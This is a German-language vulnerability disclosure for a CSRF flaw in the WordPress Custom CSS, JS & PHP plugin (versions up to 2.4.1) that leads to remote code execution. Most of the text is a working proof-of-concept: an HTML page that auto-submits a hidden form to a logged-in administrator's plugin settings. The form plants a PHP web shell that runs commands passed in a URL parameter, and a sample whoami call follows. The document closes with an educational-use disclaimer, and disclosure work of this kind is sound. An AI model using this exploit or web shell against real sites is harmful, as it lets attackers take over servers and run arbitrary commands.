
WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF zu RCE Schwachstelle
Eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle im WPFactory Custom CSS, JS & PHP Plugin ermöglicht Remote Code Execution (RCE) durch das Einschleusen von schädlichem PHP-Code über nicht autorisierte POST-Anfragen.
Dies betrifft alle Versionen bis einschließlich 2.4.1.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HUnten ist ein Screenshot, der das Ergebnis einer erfolgreichen Ausnutzung zeigt und demonstriert, wie Remote-Code über den URL-Parameter ausgeführt werden kann:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded-Hook ausgeführt.http://target-site.com/?cmd=whoami
Dieses PoC dient ausschließlich Bildungszwecken.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch unsachgemäße Anwendung dieser Informationen entstehen.
Testen Sie immer in kontrollierten Umgebungen und mit Genehmigung.
Von: Nxploited | Khaled Alenazi